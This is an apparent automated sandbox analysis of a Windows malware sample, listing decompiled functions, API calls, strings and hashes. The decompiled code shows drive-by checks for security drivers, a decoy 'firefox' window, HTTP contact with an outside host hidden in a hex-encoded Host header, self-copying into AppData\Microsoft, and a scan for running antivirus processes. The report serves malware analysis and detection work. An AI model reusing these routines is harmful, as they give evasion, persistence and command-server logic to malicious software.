Associated: 0000000B.00000002.320307802.000000000FBC4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_fbb0000_wzltxa.jbxd

Yara matches

Similarity

API ID: ContextCryptVirtuallstrlen$AcquireAddressAllocCloseCreateFreeHandleLibraryLoadModuleProcReleaseValue
String ID: A$F$H$I$P$R$R$S$U$V$W$\$\$\$d$e$f$i$i$i$n$n$n$n$r$r$r$s$u$w
API String ID: 553367697-3791882466
Opcode ID: 1535ad72f408bfc99527d6c53653d28cfc4981db059ce144a68f6136ae644965
Instruction ID: 39bf694a767c61546e5a15ecc4fa3786c072fd636ecb4f029dd2c8adde328037
Opcode Fuzzy Hash: 1535ad72f408bfc99527d6c53653d28cfc4981db059ce144a68f6136ae644965
Instruction Fuzzy Hash: 9531DAB0D0021DDEEB20CF91E948BEDBFB9FB01709F508159D9187A281D7FA49498F94

Uniqueness

Uniqueness Score: -1.00%

Function 0FBB2D30 Relevance: 54.4, APIs: 19, Strings: 12, Instructions: 137
windowthreadregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 85%

			E0FBB2D30() {
				struct _WNDCLASSEXW _v52;
				struct tagMSG _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				char _v96;
				void* _t37;
				short _t42;
				void* _t49;
				void* _t59;
				void* _t60;
				void* _t61;
				void* _t62;
				void* _t67;
				void* _t69;
				long _t71;

				_push(_t62);
				_push(_t69);
				_v84.message = 0x6c006b;
				_push(_t67);
				_v84.wParam = 0x660069;
				_v84.lParam = 0x73002e;
				_v84.time = 0x730079;
				_v84.pt = 0;
				_v96 = 0x6c006b;
				_v92 = 0x2e0031;
				_v88 = 0x790073;
				_v84.hwnd = 0x73;
				_t37 = E0FBB2F50( &(_v84.message)); // executed
				if(_t37 != 0) {
					L5:
					_v52.cbSize = 0x30;
					_v52.style = 3;
					_v52.lpfnWndProc = E0FBB2C50;
					_v52.cbClsExtra = 0;
					_v52.cbWndExtra = 0;
					_v52.hInstance = GetModuleHandleW(0);
					_v52.hIcon = 0;
					_v52.hCursor = LoadCursorW(0, 0x7f00);
					_v52.hbrBackground = 6;
					_v52.lpszMenuName = 0;
					_v52.lpszClassName = L"win32app";
					_v52.hIconSm = LoadIconW(_v52.hInstance, 0x7f00);
					_t42 = RegisterClassExW( &_v52);
					_push(0);
					if(_t42 != 0) {
						GetModuleHandleW();
						_t71 = CreateWindowExW(0, L"win32app", L"firefox", 0xcf0000, 0x80000000, 0x80000000, 5, 5, 0, 0, GetModuleHandleW(0), 0);
						SetWindowLongW(_t71, 0xfffffff0, 0);
						if(_t71 != 0) {
							ShowWindow(_t71, 5);
							UpdateWindow(_t71);
							_t49 = CreateThread(0, 0, E0FBB2D10, _t71, 0, 0);
							if(_t49 != 0) {
								CloseHandle(_t49);
							}
							if(GetMessageW( &_v84, 0, 0, 0) == 0) {
								L15:
								ExitThread(0);
							} else {
								do {
									TranslateMessage( &_v84);
								} while (DispatchMessageW( &_v84) != 0xdeadbeef && GetMessageW( &_v84, 0, 0, 0) != 0);
								goto L15;
							}
						}
						ExitThread(_t71);
					}
					ExitThread();
				}
				_t59 = E0FBB2F50( &_v96); // executed
				if(_t59 != 0) {
					goto L5;
				}
				_v84.message = 0x730066;
				_v84.wParam = 0x660064;
				_v84.lParam = 0x2e0077;
				_v84.time = 0x790073;
				_v84.pt = 0x73;
				_t60 = E0FBB2F50( &(_v84.message)); // executed
				if(_t60 != 0) {
					goto L15;
				}
				_t61 = E0FBB30A0(_t62, _t67, _t69); // executed
				if(_t61 != 0) {
					goto L15;
				}
				_push(_t61); // executed
				E0FBB2AD0(); // executed
				goto L5;
			}

0x0fbb2d39
0x0fbb2d3a
0x0fbb2d3d
0x0fbb2d45
0x0fbb2d4a
0x0fbb2d52
0x0fbb2d5a
0x0fbb2d62
0x0fbb2d67
0x0fbb2d6f
0x0fbb2d77
0x0fbb2d7f
0x0fbb2d87
0x0fbb2d8e
0x0fbb2de9
0x0fbb2df1
0x0fbb2df9
0x0fbb2e01
0x0fbb2e09
0x0fbb2e11
0x0fbb2e22
0x0fbb2e26
0x0fbb2e3d
0x0fbb2e41
0x0fbb2e49
0x0fbb2e51
0x0fbb2e5f
0x0fbb2e68
0x0fbb2e6e
0x0fbb2e73
0x0fbb2e7b
0x0fbb2eaf
0x0fbb2eb4
0x0fbb2ebc
0x0fbb2ec8
0x0fbb2ecf
0x0fbb2ee3
0x0fbb2eeb
0x0fbb2eee
0x0fbb2eee
0x0fbb2f09
0x0fbb2f3d
0x0fbb2f3f
0x0fbb2f0b
0x0fbb2f17
0x0fbb2f1c
0x0fbb2f25
0x00000000
0x0fbb2f17
0x0fbb2f09
0x0fbb2ebf
0x0fbb2ebf
0x0fbb2e75
0x0fbb2e75
0x0fbb2d94
0x0fbb2d9b
0x00000000
0x00000000
0x0fbb2da1
0x0fbb2da9
0x0fbb2db1
0x0fbb2db9
0x0fbb2dc1
0x0fbb2dc9
0x0fbb2dd0
0x00000000
0x00000000
0x0fbb2dd6
0x0fbb2ddd
0x00000000
0x00000000
0x0fbb2de3
0x0fbb2de4
0x00000000

APIs

Part of subcall function 0FBB2F50: K32EnumDeviceDrivers.KERNEL32(?,00000004,?), ref: 0FBB2F74

GetModuleHandleW.KERNEL32(?,?,?,?,?,?,?,?,?,00000000), ref: 0FBB2E19
LoadCursorW.USER32 ref: 0FBB2E2E
LoadIconW.USER32 ref: 0FBB2E59
RegisterClassExW.USER32 ref: 0FBB2E68
ExitThread.KERNEL32 ref: 0FBB2E75

Part of subcall function 0FBB2F50: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 0FBB2F8D

GetModuleHandleW.KERNEL32(00000000,?,?,?,?,?,?,00007F00), ref: 0FBB2E7B
GetModuleHandleW.KERNEL32(00000000,00000000,?,?,?,?,?,?,00007F00), ref: 0FBB2E81
CreateWindowExW.USER32 ref: 0FBB2EA7
SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 0FBB2EB4
ExitThread.KERNEL32 ref: 0FBB2EBF

Part of subcall function 0FBB2F50: K32EnumDeviceDrivers.KERNEL32(00000000,00000000,?), ref: 0FBB2FA8
Part of subcall function 0FBB2F50: K32GetDeviceDriverBaseNameW.KERNEL32(00000000,?,00000400), ref: 0FBB2FCF
Part of subcall function 0FBB2F50: lstrcmpiW.KERNEL32(?,006C006B), ref: 0FBB2FE3
Part of subcall function 0FBB2F50: VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0FBB2FFA

ExitThread.KERNEL32 ref: 0FBB2F3F

Part of subcall function 0FBB2AD0: VirtualAlloc.KERNEL32(00000000,00000800,00003000,00000040), ref: 0FBB2AEA
Part of subcall function 0FBB2AD0: GetModuleFileNameW.KERNEL32(00000000,00000000,00000100), ref: 0FBB2B2C
Part of subcall function 0FBB2AD0: GetTempPathW.KERNEL32(00000100,00000000), ref: 0FBB2B38
Part of subcall function 0FBB2AD0: ExitThread.KERNEL32 ref: 0FBB2C47

ShowWindow.USER32(00000000,00000005,?,?,?,?,?,?,00007F00), ref: 0FBB2EC8
UpdateWindow.USER32 ref: 0FBB2ECF
CreateThread.KERNEL32 ref: 0FBB2EE3
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,00007F00), ref: 0FBB2EEE
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0FBB2F05
TranslateMessage.USER32 ref: 0FBB2F1C
DispatchMessageW.USER32 ref: 0FBB2F23
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0FBB2F37

Strings

s, xrefs: 0FBB2DC1
k, xrefs: 0FBB2D67
win32app, xrefs: 0FBB2E51, 0FBB2EA0
f, xrefs: 0FBB2DA1
firefox, xrefs: 0FBB2E9B
s, xrefs: 0FBB2DB9
s, xrefs: 0FBB2D7F
0, xrefs: 0FBB2DF1
d, xrefs: 0FBB2DA9
w, xrefs: 0FBB2DB1
s, xrefs: 0FBB2D77
1, xrefs: 0FBB2D6F

Memory Dump Source

Source File: 0000000B.00000002.320288020.000000000FBB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FBB0000, based on PE: true

Associated: 0000000B.00000002.320283406.000000000FBB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.320296152.000000000FBBA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.320303150.000000000FBC2000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.320307802.000000000FBC4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_fbb0000_wzltxa.jbxd

Yara matches

Similarity

API ID: Thread$ExitHandleMessageModuleWindow$DeviceVirtual$AllocCreateDriversEnumLoadName$BaseClassCloseCursorDispatchDriverFileFreeIconLongPathRegisterShowTempTranslateUpdatelstrcmpi
String ID: 0$1$d$f$firefox$k$s$s$s$s$w$win32app
API String ID: 3011903443-520298170
Opcode ID: 2557d329064742ac55e5b53c09d2cfe815079a4f9f5d0077d409ef6dad4f823d
Instruction ID: 3dabd42c3efed921e7003f5a29bbe7561b09f903e6b485cb487c56e80ac0527c
Opcode Fuzzy Hash: 2557d329064742ac55e5b53c09d2cfe815079a4f9f5d0077d409ef6dad4f823d
Instruction Fuzzy Hash: 88517F70548301AEE3119F62DC09BAB7AE8EF45B56F10441CFA44AB1C1D7F8A106CF96

Uniqueness

Uniqueness Score: -1.00%

Function 0FBB8050 Relevance: 45.6, APIs: 13, Strings: 13, Instructions: 131
networkfilememoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0FBB8050(void* __ecx, long _a4, intOrPtr _a8, void* _a12, long _a16, void* _a20, intOrPtr _a24, WCHAR* _a36, WCHAR* _a40, long _a44) {
				long _v12;
				void* _v16;
				void* _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				short _v68;
				void* _t38;
				void* _t40;
				WCHAR* _t41;
				long _t54;
				long _t59;
				WCHAR* _t62;
				void* _t63;
				void* _t64;
				void* _t65;
				void* _t67;

				_t64 = __ecx;
				_t38 =  *(__ecx + 4);
				if(_t38 != 0) {
					InternetCloseHandle(_t38);
				}
				E0FBB7E40(_t64); // executed
				_t40 = InternetConnectW( *(_t64 + 4), _a4, 0x50, 0, 0, 3, 0, 0); // executed
				_t65 = _t40;
				_v12 = 0;
				_v16 = _t65;
				if(_t65 != 0) {
					_t41 = VirtualAlloc(0, 0x2800, 0x3000, 0x40); // executed
					_t62 = _t41;
					_v20 = _t62;
					wsprintfW(_t62, L"%s", _a8);
					_t63 = HttpOpenRequestW(_t65, _a36, _t62, L"HTTP/1.1", 0, 0, 0x8404f700, 0);
					if(_t63 != 0) {
						_v68 = 0x6f0048;
						_v64 = 0x740073;
						_v60 = 0x20003a;
						_v56 = 0x6f0070;
						_v52 = 0x69006c;
						_v48 = 0x690074;
						_v44 = 0x720061;
						_v40 = 0x6d006f;
						_v36 = 0x6e0061;
						_v32 = 0x2e0061;
						_v28 = 0x690062;
						_v24 = 0x74;
						if(HttpAddRequestHeadersW(_t63,  &_v68, 0xffffffff, 0) != 0) {
							if(HttpSendRequestW(_t63, _a40, _a44, _a12, _a16) == 0) {
								GetLastError();
							} else {
								_t67 = _a20;
								_t59 = _a24 - 1;
								_a4 = 0;
								if(InternetReadFile(_t63, _t67, _t59,  &_a4) != 0) {
									while(1) {
										_t54 = _a4;
										if(_t54 == 0) {
											goto L13;
										}
										 *((char*)(_t54 + _t67)) = 0;
										_a4 = 0;
										_v12 = 1;
										if(InternetReadFile(_t63, _t67, _t59,  &_a4) != 0) {
											continue;
										} else {
										}
										goto L13;
									}
								}
							}
						}
					}
					L13:
					InternetCloseHandle(_t63); // executed
					InternetCloseHandle(_v16);
					VirtualFree(_v20, 0, 0x8000); // executed
					return _v12;
				} else {
					return _t40;
				}
			}

0x0fbb8058
0x0fbb805b
0x0fbb8060
0x0fbb8063
0x0fbb8063
0x0fbb806b
0x0fbb8082
0x0fbb8088
0x0fbb808a
0x0fbb8091
0x0fbb8096
0x0fbb80af
0x0fbb80b8
0x0fbb80c0
0x0fbb80c3
0x0fbb80e7
0x0fbb80eb
0x0fbb80f8
0x0fbb8101
0x0fbb8108
0x0fbb810f
0x0fbb8116
0x0fbb811d
0x0fbb8124
0x0fbb812b
0x0fbb8132
0x0fbb8139
0x0fbb8140
0x0fbb8147
0x0fbb8156
0x0fbb816d
0x0fbb81bc
0x0fbb816f
0x0fbb8175
0x0fbb8178
0x0fbb817d
0x0fbb818c
0x0fbb8190
0x0fbb8190
0x0fbb8195
0x00000000
0x00000000
0x0fbb8197
0x0fbb81a2
0x0fbb81a9
0x0fbb81b8
0x00000000
0x00000000
0x0fbb81ba
0x00000000
0x0fbb81b8
0x0fbb8190
0x0fbb818c
0x0fbb816d
0x0fbb8156
0x0fbb81c2
0x0fbb81c9
0x0fbb81ce
0x0fbb81da
0x0fbb81e9
0x0fbb809e
0x0fbb809e
0x0fbb809e

APIs

InternetCloseHandle.WININET(?), ref: 0FBB8063
InternetConnectW.WININET(?,00000000,00000050,00000000,00000000,00000003,00000000,00000000), ref: 0FBB8082
VirtualAlloc.KERNEL32(00000000,00002800,00003000,00000040,?,?,?,?,?,?,?,?,?,0FBB7046,ipv4bot.whatismyipaddress.com,0FBBFF90), ref: 0FBB80AF
wsprintfW.USER32 ref: 0FBB80C3
HttpOpenRequestW.WININET(00000000,?,00000000,HTTP/1.1,00000000,00000000,8404F700,00000000), ref: 0FBB80E1
HttpAddRequestHeadersW.WININET(00000000,?,000000FF,00000000), ref: 0FBB814E
HttpSendRequestW.WININET(00000000,00690074,0069006C,00000000,00000074), ref: 0FBB8165
InternetReadFile.WININET(00000000,00690062,002E0060,00000000), ref: 0FBB8184
InternetReadFile.WININET(00000000,00690062,002E0060,00000000), ref: 0FBB81B0
GetLastError.KERNEL32 ref: 0FBB81BC
InternetCloseHandle.WININET(00000000), ref: 0FBB81C9
InternetCloseHandle.WININET(00000000), ref: 0FBB81CE
VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?,?,?,0FBB7046), ref: 0FBB81DA

Strings

a, xrefs: 0FBB8132
b, xrefs: 0FBB8140
t, xrefs: 0FBB811D
o, xrefs: 0FBB812B
t, xrefs: 0FBB8147
H, xrefs: 0FBB80F8
l, xrefs: 0FBB8116
s, xrefs: 0FBB8101
:, xrefs: 0FBB8108
a, xrefs: 0FBB8124
p, xrefs: 0FBB810F
a, xrefs: 0FBB8139
HTTP/1.1, xrefs: 0FBB80D7

Memory Dump Source

Source File: 0000000B.00000002.320288020.000000000FBB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FBB0000, based on PE: true

Associated: 0000000B.00000002.320283406.000000000FBB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.320296152.000000000FBBA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.320303150.000000000FBC2000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.320307802.000000000FBC4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_fbb0000_wzltxa.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleHttpRequest$FileReadVirtual$AllocConnectErrorFreeHeadersLastOpenSendwsprintf
String ID: :$H$HTTP/1.1$a$a$a$b$l$o$p$s$t$t
API String ID: 3906118045-2187218134
Opcode ID: 1a9fb9dd32816a4ce715a91077b8d8365e89993e24d66a88fef6557b3c9339f8
Instruction ID: 7ce076a30d1fec4ea712256e79fb9a48757cb1a52799fc1dcd7474394af4f5c6
Opcode Fuzzy Hash: 1a9fb9dd32816a4ce715a91077b8d8365e89993e24d66a88fef6557b3c9339f8
Instruction Fuzzy Hash: 51416E30A00209ABEB108F56DC48FEEBFBDEF05B55F104159F904AA291C7F59952CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 0FBB2AD0 Relevance: 29.9, APIs: 10, Strings: 7, Instructions: 114
stringmemorythreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 93%

			E0FBB2AD0() {
				short _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				short _v20;
				WCHAR* _v24;
				WCHAR* _v28;
				long _v32;
				intOrPtr _v36;
				WCHAR* _t24;
				void* _t27;
				WCHAR* _t33;
				WCHAR* _t38;
				signed int _t40;
				signed int _t46;
				WCHAR* _t50;
				WCHAR* _t54;
				void* _t56;
				WCHAR* _t57;
				void* _t58;
				WCHAR* _t64;
				WCHAR* _t65;
				WCHAR* _t67;
				signed int _t69;
				void* _t71;
				void* _t72;

				_t71 = (_t69 & 0xfffffff8) - 0x1c;
				_t24 = VirtualAlloc(0, 0x800, 0x3000, 0x40); // executed
				_v24 = _t24;
				_t64 = _t24;
				_v32 = 0;
				if(_t24 == 0) {
					_t67 = 0;
					_t50 = 0;
					__eflags = 0;
				} else {
					_t3 =  &(_t24[0x101]); // 0x202
					_t65 = _t3;
					_v32 = 0x404;
					_t50 = _t65;
					_t67 = _t24;
					_t64 =  &(_t65[0x101]);
				}
				_v28 = _t67;
				GetModuleFileNameW(0, _t67, 0x100);
				GetTempPathW(0x100, _t50);
				_t6 =  &(_t50[1]); // 0x204
				_t27 = E0FBB81F0(_t67, _t6);
				_t75 = _t27;
				if(_t27 == 0) {
					_v20 = 0x520050;
					_v8 = 0;
					_push(0x52);
					_v16 = 0x440049;
					_v12 = 0x520055;
					E0FBB82B0( &_v20, lstrlenW( &_v20)); // executed
					_t72 = _t71 + 4;
					GetEnvironmentVariableW(L"AppData", _t50, 0x100);
					_t13 =  &(_t50[1]); // 0x2
					_t54 = _t67;
					_t33 = E0FBB81F0(_t54, _t13);
					__eflags = _t33;
					if(_t33 == 0) {
						lstrcatW(_t50, L"\\Microsoft\\");
						lstrcatW(_t50,  &_v20);
						lstrcatW(_t50, L".exe");
						_push(_t54);
						_t38 = E0FBB2890(_v28, _t50);
						_t72 = _t72 + 4;
						__eflags = _t38;
						if(_t38 == 0) {
							goto L17;
						}
						_t40 = lstrlenW(_t50);
						__eflags = _v28;
						_t56 = 0xa + _t40 * 2;
						if(_v28 == 0) {
							L13:
							_t64 = 0;
							__eflags = 0;
							L14:
							_push(_t50);
							L15:
							wsprintfW(_t64, L"\"%s\"");
							_t57 = _t64;
							goto L16;
						}
						__eflags = _v36 + _t56 - 0x800;
						if(__eflags < 0) {
							goto L14;
						}
						goto L13;
					}
					_t46 = lstrlenW(_t67);
					__eflags = _v28;
					_t58 = 0xa + _t46 * 2;
					if(_v28 == 0) {
						L8:
						_t64 = 0;
						__eflags = 0;
						L9:
						_push(_t67);
						goto L15;
					}
					__eflags = _v36 + _t58 - 0x800;
					if(__eflags < 0) {
						goto L9;
					}
					goto L8;
				} else {
					_t57 = _t67;
					L16:
					E0FBB2960(_t57, _t75); // executed
					L17:
					ExitThread(0);
				}
			}

0x0fbb2ad6
0x0fbb2aea
0x0fbb2af0
0x0fbb2af4
0x0fbb2af6
0x0fbb2b00
0x0fbb2b1c
0x0fbb2b1e
0x0fbb2b1e
0x0fbb2b02
0x0fbb2b02
0x0fbb2b02
0x0fbb2b08
0x0fbb2b10
0x0fbb2b12
0x0fbb2b14
0x0fbb2b14
0x0fbb2b28
0x0fbb2b2c
0x0fbb2b38
0x0fbb2b3e
0x0fbb2b43
0x0fbb2b48
0x0fbb2b4a
0x0fbb2b55
0x0fbb2b62
0x0fbb2b67
0x0fbb2b6c
0x0fbb2b75
0x0fbb2b89
0x0fbb2b8e
0x0fbb2b9c
0x0fbb2ba2
0x0fbb2ba5
0x0fbb2ba7
0x0fbb2bac
0x0fbb2bae
0x0fbb2be4
0x0fbb2bec
0x0fbb2bf4
0x0fbb2bf6
0x0fbb2bfd
0x0fbb2c02
0x0fbb2c05
0x0fbb2c07
0x00000000
0x00000000
0x0fbb2c0f
0x0fbb2c11
0x0fbb2c16
0x0fbb2c1d
0x0fbb2c2c
0x0fbb2c2c
0x0fbb2c2c
0x0fbb2c2e
0x0fbb2c2e
0x0fbb2c2f
0x0fbb2c35
0x0fbb2c3b
0x00000000
0x0fbb2c3d
0x0fbb2c25
0x0fbb2c2a
0x00000000
0x00000000
0x00000000
0x0fbb2c2a
0x0fbb2bb6
0x0fbb2bb8
0x0fbb2bbd
0x0fbb2bc4
0x0fbb2bd3
0x0fbb2bd3
0x0fbb2bd3
0x0fbb2bd5
0x0fbb2bd5
0x00000000
0x0fbb2bd5
0x0fbb2bcc
0x0fbb2bd1
0x00000000
0x00000000
0x00000000
0x0fbb2b4c
0x0fbb2b4c
0x0fbb2c40
0x0fbb2c40
0x0fbb2c45
0x0fbb2c47
0x0fbb2c47

APIs

VirtualAlloc.KERNEL32(00000000,00000800,00003000,00000040), ref: 0FBB2AEA
GetModuleFileNameW.KERNEL32(00000000,00000000,00000100), ref: 0FBB2B2C
GetTempPathW.KERNEL32(00000100,00000000), ref: 0FBB2B38
lstrlenW.KERNEL32(?,?,?,00000052), ref: 0FBB2B7D

Part of subcall function 0FBB82B0: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000,00000000,00000000,00000000), ref: 0FBB82CD
Part of subcall function 0FBB82B0: VirtualAlloc.KERNEL32(00000000,00000001,00003000,00000040), ref: 0FBB82FB
Part of subcall function 0FBB82B0: GetModuleHandleA.KERNEL32(?), ref: 0FBB834F
Part of subcall function 0FBB82B0: LoadLibraryA.KERNEL32(Advapi32.dll), ref: 0FBB835D
Part of subcall function 0FBB82B0: GetProcAddress.KERNEL32(00000000,CryptGenRandomAdvapi32.dll), ref: 0FBB836C
Part of subcall function 0FBB82B0: CryptReleaseContext.ADVAPI32(?,00000000), ref: 0FBB83B5
Part of subcall function 0FBB82B0: VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0FBB83C3

GetEnvironmentVariableW.KERNEL32(AppData,00000000,00000100), ref: 0FBB2B9C
lstrcatW.KERNEL32 ref: 0FBB2BE4
lstrcatW.KERNEL32 ref: 0FBB2BEC
lstrcatW.KERNEL32 ref: 0FBB2BF4
wsprintfW.USER32 ref: 0FBB2C35
ExitThread.KERNEL32 ref: 0FBB2C47

Strings

.exe, xrefs: 0FBB2BEE
\Microsoft\, xrefs: 0FBB2BDE
I, xrefs: 0FBB2B6C
U, xrefs: 0FBB2B75
P, xrefs: 0FBB2B55
"%s", xrefs: 0FBB2C2F
AppData, xrefs: 0FBB2B97

Memory Dump Source

Source File: 0000000B.00000002.320288020.000000000FBB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FBB0000, based on PE: true

Associated: 0000000B.00000002.320283406.000000000FBB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.320296152.000000000FBBA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.320303150.000000000FBC2000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.320307802.000000000FBC4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_fbb0000_wzltxa.jbxd

Yara matches

Similarity

API ID: Virtuallstrcat$AllocContextCryptModule$AcquireAddressEnvironmentExitFileFreeHandleLibraryLoadNamePathProcReleaseTempThreadVariablelstrlenwsprintf
String ID: "%s"$.exe$AppData$I$P$U$\Microsoft\
API String ID: 139215849-2398311915
Opcode ID: 3da6aa60238ca1a81f91ec9f4e982db4116a74605a482806dbda5aedf406c2d2
Instruction ID: b9aff3555efc227f86635e2474e0d902133cdfb0abf2f4f6877c6c2ce492ea94
Opcode Fuzzy Hash: 3da6aa60238ca1a81f91ec9f4e982db4116a74605a482806dbda5aedf406c2d2
Instruction Fuzzy Hash: F841C171604300ABE305EF21EC49BBB7A9DAF84711F00046CB94597282DEF8D90ACFA6

Uniqueness

Uniqueness Score: -1.00%

Function 0FBB7B70 Relevance: 25.6, APIs: 17, Instructions: 150
memorystringprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 80%

			E0FBB7B70(void** _a4, intOrPtr* _a8) {
				signed int _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _v24;
				WCHAR* _v28;
				WCHAR* _v32;
				WCHAR* _v36;
				WCHAR* _v40;
				WCHAR* _v44;
				WCHAR* _v48;
				WCHAR* _v52;
				WCHAR* _v56;
				WCHAR* _v60;
				WCHAR* _v64;
				WCHAR* _v68;
				WCHAR* _v72;
				WCHAR* _v76;
				WCHAR* _v80;
				void* _t46;
				void* _t47;
				void* _t49;
				int _t50;
				WCHAR* _t56;
				int _t63;
				void** _t68;
				void* _t75;
				long _t76;
				WCHAR* _t77;
				signed int _t79;
				void* _t83;

				_t46 = VirtualAlloc(0, 0x400, 0x3000, 4); // executed
				_t68 = _a4;
				 *_t68 = _t46;
				_v80 = L"AVP.EXE";
				_v76 = L"ekrn.exe";
				_v72 = L"avgnt.exe";
				_v68 = L"ashDisp.exe";
				_v64 = L"NortonAntiBot.exe";
				_v60 = L"Mcshield.exe";
				_v56 = L"avengine.exe";
				_v52 = L"cmdagent.exe";
				_v48 = L"smc.exe";
				_v44 = L"persfw.exe";
				_v40 = L"pccpfw.exe";
				_v36 = L"fsguiexe.exe";
				_v32 = L"cfp.exe";
				_v28 = L"msmpeng.exe";
				_t47 = VirtualAlloc(0, 4, 0x3000, 4); // executed
				_t75 = _t47;
				_v24 = _t75;
				if(_t75 == 0) {
					L3:
					return 0;
				} else {
					 *_t75 = 0x22c; // executed
					_t49 = CreateToolhelp32Snapshot(2, 0); // executed
					_v20 = _t49;
					if(_t49 != 0xffffffff) {
						_t79 = 0;
						_push(_t75);
						_v12 = 0;
						_a4 = 0;
						_v16 = 0;
						_v8 = 0;
						_t50 = Process32FirstW(_t49); // executed
						if(_t50 != 0) {
							L6:
							while(_t79 == 0) {
								_t77 = _t75 + 0x24;
								while(lstrcmpiW( *(_t83 + _t79 * 4 - 0x4c), _t77) != 0) {
									_t79 = _t79 + 1;
									if(_t79 < 0xe) {
										continue;
									} else {
										_t79 = _v8;
									}
									L15:
									_t75 = _v24;
									_t63 = Process32NextW(_v20, _t75); // executed
									if(_t63 != 0 && GetLastError() != 0x12) {
										goto L6;
									}
									goto L17;
								}
								_push(_t77);
								_push( *_t68);
								_v16 = 1;
								if(_a4 != 0) {
									lstrcatW();
									lstrcatW( *_t68, ",");
								} else {
									lstrcpyW();
									lstrcatW( *_t68, ",");
								}
								_a4 =  &(_a4[0]);
								_v12 = _v12 + lstrlenW(_t77) * 2;
								_t79 =  >  ? 1 : _v8;
								_v8 = _t79;
								goto L15;
							}
							L17:
							if(_v16 != 0) {
								_t56 =  *_t68;
								if( *_t56 != 0) {
									 *((short*)( *_t68 + lstrlenW(_t56) * 2 - 2)) = 0;
								}
							}
							 *_a8 = _v12;
						}
						VirtualFree(_t75, 0, 0x8000); // executed
						FindCloseChangeNotification(_v20); // executed
						_t76 = _v16;
						if(_t76 == 0) {
							VirtualFree( *_t68, _t76, 0x8000); // executed
						}
						return _t76;
					} else {
						VirtualFree(_t75, 0, 0x8000);
						goto L3;
					}
				}
			}

0x0fbb7b8d
0x0fbb7b8f
0x0fbb7b9d
0x0fbb7b9f
0x0fbb7ba6
0x0fbb7bad
0x0fbb7bb4
0x0fbb7bbb
0x0fbb7bc2
0x0fbb7bc9
0x0fbb7bd0
0x0fbb7bd7
0x0fbb7bde
0x0fbb7be5
0x0fbb7bec
0x0fbb7bf3
0x0fbb7bfa
0x0fbb7c01
0x0fbb7c03
0x0fbb7c05
0x0fbb7c0a
0x0fbb7c34
0x0fbb7c3a
0x0fbb7c0c
0x0fbb7c10
0x0fbb7c16
0x0fbb7c1c
0x0fbb7c22
0x0fbb7c3f
0x0fbb7c41
0x0fbb7c43
0x0fbb7c46
0x0fbb7c49
0x0fbb7c4c
0x0fbb7c4f
0x0fbb7c57
0x00000000
0x0fbb7c60
0x0fbb7c68
0x0fbb7c70
0x0fbb7c7f
0x0fbb7c83
0x00000000
0x0fbb7c85
0x0fbb7c85
0x0fbb7c85
0x0fbb7ce7
0x0fbb7ce7
0x0fbb7cee
0x0fbb7cf6
0x00000000
0x00000000
0x00000000
0x0fbb7cf6
0x0fbb7c8e
0x0fbb7c8f
0x0fbb7c91
0x0fbb7c98
0x0fbb7cb5
0x0fbb7cbe
0x0fbb7c9a
0x0fbb7c9a
0x0fbb7ca7
0x0fbb7ca7
0x0fbb7cc0
0x0fbb7cde
0x0fbb7ce1
0x0fbb7ce4
0x00000000
0x0fbb7ce4
0x0fbb7d07
0x0fbb7d0b
0x0fbb7d0d
0x0fbb7d13
0x0fbb7d20
0x0fbb7d20
0x0fbb7d13
0x0fbb7d2b
0x0fbb7d2b
0x0fbb7d3b
0x0fbb7d40
0x0fbb7d46
0x0fbb7d4b
0x0fbb7d55
0x0fbb7d55
0x0fbb7d5f
0x0fbb7c24
0x0fbb7c2c
0x00000000
0x0fbb7c2c
0x0fbb7c22

APIs

VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004,74CB66A0,?,7491C0B0), ref: 0FBB7B8D
VirtualAlloc.KERNEL32(00000000,00000004,00003000,00000004), ref: 0FBB7C01
CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0FBB7C16
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0FBB7C2C
